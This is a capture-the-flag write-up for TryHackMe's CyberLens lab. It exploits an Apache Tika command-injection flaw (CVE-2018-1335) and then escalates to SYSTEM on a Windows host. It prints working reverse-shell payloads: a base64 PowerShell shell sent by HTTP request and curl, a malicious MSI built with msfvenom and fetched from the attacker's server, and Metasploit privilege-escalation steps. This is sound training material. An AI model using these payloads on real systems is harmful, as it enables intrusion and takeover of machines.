> For the complete documentation index, see [llms.txt](https://manav-g-krishna.gitbook.io/tryhackme-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://manav-g-krishna.gitbook.io/tryhackme-writeups/cyberlens.md). # CyberLens {% embed url="" %} Room Link {% endembed %} This work by Manav G Krishna is licensed under [CC BY-NC 4.0](http://creativecommons.org/licenses/by-nc/4.0/?ref=chooser-v1)

**`Machine IP`**: 10.10.131.149 **`Nmap Scan`**: ```python nmap -p- -v 10.10.131.149 --min-rate 100 -oN cyberlens_thm -Pn Nmap scan report for cyberlens.thm (10.10.131.149) Host is up (0.15s latency). Not shown: 65518 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.57 ((Win64)) |_http-title: CyberLens: Unveiling the Hidden Matrix | http-methods: | Supported Methods: GET POST OPTIONS HEAD TRACE |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.57 (Win64) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-05-18T05:18:41+00:00; +2s from scanner time. | ssl-cert: Subject: commonName=CyberLens | Issuer: commonName=CyberLens | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-05-17T05:04:27 | Not valid after: 2024-11-16T05:04:27 | MD5: 0a8f:0621:514f:c425:d6c1:c704:82bf:3dbb |_SHA-1: 9cc8:94c9:73db:50dc:215f:e168:4e54:f1d9:9554:9106 | rdp-ntlm-info: | Target_Name: CYBERLENS | NetBIOS_Domain_Name: CYBERLENS | NetBIOS_Computer_Name: CYBERLENS | DNS_Domain_Name: CyberLens | DNS_Computer_Name: CyberLens | Product_Version: 10.0.17763 |_ System_Time: 2024-05-18T05:18:33+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 7680/tcp open pando-pub? 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 61777/tcp open http Jetty 8.y.z-SNAPSHOT | http-methods: | Supported Methods: POST GET PUT OPTIONS HEAD |_ Potentially risky methods: PUT |_http-title: Welcome to the Apache Tika 1.17 Server |_http-cors: HEAD GET |_http-server-header: Jetty(8.y.z-SNAPSHOT) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=5/18%OT=80%CT=1%CU=30699%PV=Y%DS=2%DC=T%G=Y%TM=6648 OS:3A2F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S% OS:TS=U)SEQ(SP=104%GCD=1%ISR=105%TI=I%CI=I%TS=U)SEQ(SP=104%GCD=1%ISR=105%TI OS:=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=2%ISR=106%TI=I%CI=I%II=I%SS=S%TS=U OS:)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS% OS:O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%D OS:F=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0 OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S= OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T= OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z OS:) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=261 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1s, deviation: 0s, median: 1s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2024-05-18T05:18:36 |_ start_date: N/A TRACEROUTE (using port 199/tcp) HOP RTT ADDRESS 1 148.60 ms 10.11.0.1 2 149.53 ms cyberlens.thm (10.10.131.149) ``` Let us add **`cyberlens.thm`** to the **`hosts`** file as mentioned in the description of the room. **`Command`**: ```python sudo echo '10.10.131.149 cyberlens.thm' >> /etc/hosts ``` Instead of waiting for the scan to complete fully, we can navigate to the website on port **`80`**. As the **`verbose`** switch is being used in the **`Nmap`** command, we will straight away be able to see the ports as and when it is found. **`Checking out Port 80`**:

We can see what **`Wappalyzer`** tells us:

The web server running is **`Apache 2.4.57`**. We have a **`contact form`** here:

**`Testing out a basic XSS Payload`**:

Now let's set up a **`netcat`** listener on port **`80`**. If the above payload works we should be getting a connection back on our listener which basically shows that the server has reached out to our machine. The **`IP`** specified in the payload is the **`tun0`** interface **`IP`**.

But unfortunately we don't get any connection on the listener. Nothing out of the blue was found while **`directory busting`**. No results were yielded from **`VHOST busting`**. There is a feature on the site called, **`CyberLens Image Extractor`** :

Basically we can **`upload`** files and the feature fetches the **`metadata`** present within those files. Metadata is the **`hidden data`** that accompanies every image, video, and file you encounter. **`Checking out this feature by intercepting the request in BurpSuite`**: After turning on the intercept in **`Burp`** we just have to upload a file and click on the **`Get Metadata`** button and the request will get captured in **`Burp`** :

**`Forward`** the above request and we will be on the one that we need:

This shows that the **`metadata extraction`** takes place on port **`61777`**. We can now check out the **`Nmap`** scan that would have completed fully by now and can also check out the website on that port:

We can see that it is using **`Apache Tika 1.17`**. It is an open-source software library that detects and **`extracts metadata`** and **`structured text`** from a **`variety`** of file formats. This is what is being used to fetch the **`metadata`** from the files that we upload in the **`CyberLens Image Extractor`** feature. We can confirm the same by looking at the **`metadata`** it extracts, mainly checking out the **`Parsing headers`**, have uploaded a pdf file this time:

And also the endpoint as seen from the request is **`/meta`** and this is where our request post clicking on **`Get Metadata`** is being sent to, data is being **`PUT`** to the server:

Now that we fully know what exactly is happening, we can try to find out exploits for - **`Apache Tika 1.17`** and this leads us to **`CVE-2018-1335`**. **`CVE-2018-1335 - Command Injection in Apache Tika`**: {% embed url="" %} CVE-2018-1335 {% endembed %} **`Note`**: I will be showing **`3`** ways to get the **`foothold`** by exploiting the above mentioned **`CVE`**. First way being doing it **`manually`**, second way via the **`POC (python script)`** and the final way via **`Metasploit`**. **`Manual Exploitation to get a Reverse Shell`**: Towards the end of the above attached blog, we find this:

Based on this, we have to include a a few **`headers`** , change the content-type and also have to add the **`JS`** code in the body of the request. ```javascript var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c calc.exe'); ``` Apparently what these two **`JS`** lines are doing is, firstly it is creating a **`WScript.Shell object`**, which provides access to **`Windows shell`** functionalities. **`WScript`** is used to interpret and execute scripts written in scripting languages such as **`VBScript`** and **`JScript`** and secondly this object is being used to run the command **`cmd /c calc.exe`**, which opens up **`Calculator`** of the target machine. The command can be modified by us to get a **`reverse shell`** instead. **`Base64 Encoded PS Reverse Shell`**: {% embed url="" %}

Setting up a listener on port **`445`**:

**`Final Request`**: The extra **`headers`** include: ```python X-Tika-OCRTesseractPath: "cscript" X-Tika-OCRLanguage: //E:Jscript ``` And also the **`Content-Type`** has to be changed to **`image/jp2`**. The request **`body`**: ```python var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='); ``` ```python PUT /meta HTTP/1.1 Host: cyberlens.thm:61777 Content-Type: image/jp2 X-Tika-OCRTesseractPath: "cscript" X-Tika-OCRLanguage: //E:Jscript var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='); ```

The same can be done through **`curl`** too: **`Command`**: ```python curl -X PUT http://cyberlens.thm:61777/meta \ -H "Content-Type: image/jp2" \ -H 'X-Tika-OCRTesseractPath: "cscript"' \ -H 'X-Tika-OCRLanguage: //E:Jscript' \ --data ' var oShell = WScript.CreateObject("WScript.Shell"); var oExec = oShell.Exec('\''cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='\''); ' ``` We just send the request and we can check out the listener:

Now we have successfully got a shell as the user **`cyberlens`** and we can get the user flag in this user's **`Desktop`** folder. **`Using POC to get a Reverse Shell`**: {% embed url="" %}

**`Command`**: ```python python3 exploit.py cyberlens.thm 61777 'cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' ``` The **`Base64 Encoded PS Payload`** is what is being used here too. We have now got the shell:

**`Using Metasploit`**: **`Command`**: ```python msfconsole -q //This starts metasploit in quite mode, that is it doesn't print out the banner ```

Setting the **`options`**: Running **`systeminfo`** from the shell that we previously got from the above mentioned ways, gives us the type: **`Command`**: ```python systeminfo | findstr /B /C:"System Type" ```

It is a **`64-bit`** machine. So while setting the payload option we would have to set a **`64-bit`** payload.

Now we just **`run`** the exploit:

Yet again, we have a shell. Let us see if we can do some **`enumeration`** and find if **`passwords`** of any users are stored in **`files`** etc, which is a pretty common thing that is found in **`real world pentests`** too. Let us check out a few **`common`** file types that passwords could be stored in such as **`.txt`**, .**`xml`**, **`.ini`** etc. We can firstly look within **`CyberLens's home`** folder **`Command`**: ```python Get-ChildItem -Path . -Recurse -Include *.txt,*.xml,*.ini ```

There is a file called **`CyberLens-Management.txt`**. Let us check it out:

And indeed we find **`CyberLens's`** password. Also the **`Nmap`** scan shows us that port **`3389`** is open. Let us confirm we if can **`RDP`** in as **`CyberLens`**: **`Command`**: ```python netexec rdp cyberlens.thm -u CyberLens -p 'insert_password' ```

**`NetExec`** says **`Pwn3d!`**. This means the creds are **`valid`** and we can **`RDP`** in. **`Note`**: **`RDP`** ing is **`not needed`** considering we already have a **`shell`** as **`CyberLens`**. Below shown are the steps to follow if you want to try it out. **`Command`**: ```python xfreerdp /u:CyberLens /p:'insert_password' /v:cyberlens.thm /dynamic-resolution ```

We have got in. **`Privilege Escalation to SYSTEM (Intended Way)`**: We can firstly check if **`Windows Defender`** is running or not: **`Command`**: ```python sc.exe query WinDefend ```

We can see that the **`STATE`** is **`STOPPED`**, which means **`Defender`** is **`not`** runnning. Now let us use **`WinPEAS`** on the machine by serving it via a **`python server`** and a **`64-bit WinPEAS`** is what we need as the target system is **`64-bit`** . We can write to the **`home`** folder or **`Desktop`** folder of the user **`CyberLens`** as we have **`Full Control (F)`** in these locations:

**`Command`**: ```python IWR -Uri http://10.11.75.84:4545/winPEASx64.exe -OutFile winPEASx64.exe ```

**`Running WinPEAS`**:

We then come across this:

We can see that the **`AlwaysInstallElevated Policy`** is set to **`1 (Enabled)`** for both **`HKLM (HKEY_LOCAL_MACHINE)`** & **`HKCU (HKEY_CURRENT_USER)`** registry hives. This policy allows **`non-administrative users`** to **`install`** software with **`elevated privileges`**. In this case it is enabled globally (for all users) as well as for the current user on the system. This policy allows a **`regular user`** to install **`MSI`** files with **`high/elevated`** privileges. **`Manually`** enumerating the status of **`AlwaysInstallElevated`**: **`Commands`**: ```python reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated ```

This can be abused by us in order to **`escalate privileges`** to become **`SYSTEM`** by crafting a **`malicious MSI`** file. {% embed url="" %}

We can create a **`.msi`** payload using **`msfvenom`**and this can be served via a **`python server`**. **`Command`**: ```python msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=443 -a x64 --platform windows -f msi -o evil.msi ```

**`Command`**: ```python IWR -Uri http://10.11.75.84:4545/evil.msi -OutFile evil.msi ```

Now let us setup a listener on port **`443`**:

Running the **`bad MSI`** file: **`Command`**: ```python msiexec.exe /i evil.msi ```

Now let us check out our listener:

We have successfully got a shell as **`SYSTEM`**. The **`admin flag`** can be found in the **`Desktop`** folder of **`Administrator`**. The same can be done via **`Metasploit`** too (**`exploit/windows/local/always_install_elevated`**). **`Privilege Escalation to SYSTEM (Unintended Way)`**: Let us check out the **`OS Version`** on the machine: **`Command`**: ```python systeminfo | findstr /B /C:"OS Version" ```

It is **`10.0.17763 N/A Build 17763`**. We can now check out exploits for the same And we get this in one of the results:

It is a **`LPE (Privilege Escalation)`** exploit. **`CVE-2021-40449 (Win32k - LPE)`**: {% embed url="" %} CVE-2021-40449 {% endembed %} We can check out the repo:

We can see that the **`exact version`** that we have on the **`target`** is **`vulnerable`** to this **`LPE`** exploit. This can be used to get to **`SYSTEM`**. The repo **`doesn't have`** pre-compiled binaries. The **`.sln`** file has to be compiled to an **`.exe`** file and this can be achieved by using **`Visual Studio`**. There are other ways to do it too, but it is a **`lengthy procedure`**. Instead we can exploit this in an **`easier`** way using **`Metasploit`**. **`Note`**: We can use the **`meterpreter shell`** that we had got by exploiting the **`Apache Tika CVE`** initially to run the above mentioned **`LPE`** exploit or we can use the **`web_delivery`** exploit in the shell that we got by **`manually`** exploiting the **`Tika CVE`**. The **`easier`** and the more practical way of getting a **`meterpreter`** shell would be through **`web_delivery`**. But in this case since we have a **`meterpreter`** shell from before, I will be using that as it is a shell obtained in the **`context`** of this machine and mainly cause you have the **`option`** to **`choose`** which way you would like to follow to get to **`SYSTEM`**. Also for the **`LPE`** exploit, a couple repo's containing the pre built binary was found but they **`didn't work`**. **`Getting the shell as CyberLens by exploiting CVE-2018-1335`**:

**`CVE-2021-40449 Exploitation`**:

The initial **`meterpreter`** shell is **`backgrounded`** (**`bg`**) so that it can be used with the exploit.

Setting the **`options`**: We have to firstly set the **`SESSION`**, which is basically the initial shell that we had obtained. This is how the exploit module knows where to perform the **`LPE`** exploit on.

**`Note`**: The **`SESSION`** count is **`3`** for me as this is the **`3rd session`** that I have opened. This **`won't`** be the same in your case, it depends on how many sessions were opened before using the **`Apache Tika Metasploit`** exploit. Make sure to type in the **`meterpreter`** command - **`sessions`** to find out your current session **`ID`**.

We had left the **`LPORT`** to the default setting of port **`4444`** initially while performing the **`Tika`** exploit via **`Metasploit`**. Now we would have to use a different **`LPORT`** for the exploit to listen on, so we can set it to **`5555`**. Now we just **`run`** the exploit:

We are **`SYSTEM`** again. We could also find the **`LPE`** exploit in a simpler way through the **`meterpreter`** shell itself by using **`Metasploit's Lester (Local Exploit Suggester)`**: {% embed url="" %} This **`module`** scans the system and it **`finds`** and **`lists`** out possible **`vulnerabilities`**. **`Command`**: ```python run post/multi/recon/local_exploit_suggester ```

**`Note`**: All exploits mentioned by the **`suggester`** were tried out but the only one that worked was **`CVE-2021-40449`**. Also there are multiple **`post exploitation`** recon tools like **`Lester`** that yields the same result as shown above. Room solved!! {% embed url="" %} Profile Link {% endembed %} --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manav-g-krishna.gitbook.io/tryhackme-writeups/cyberlens.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.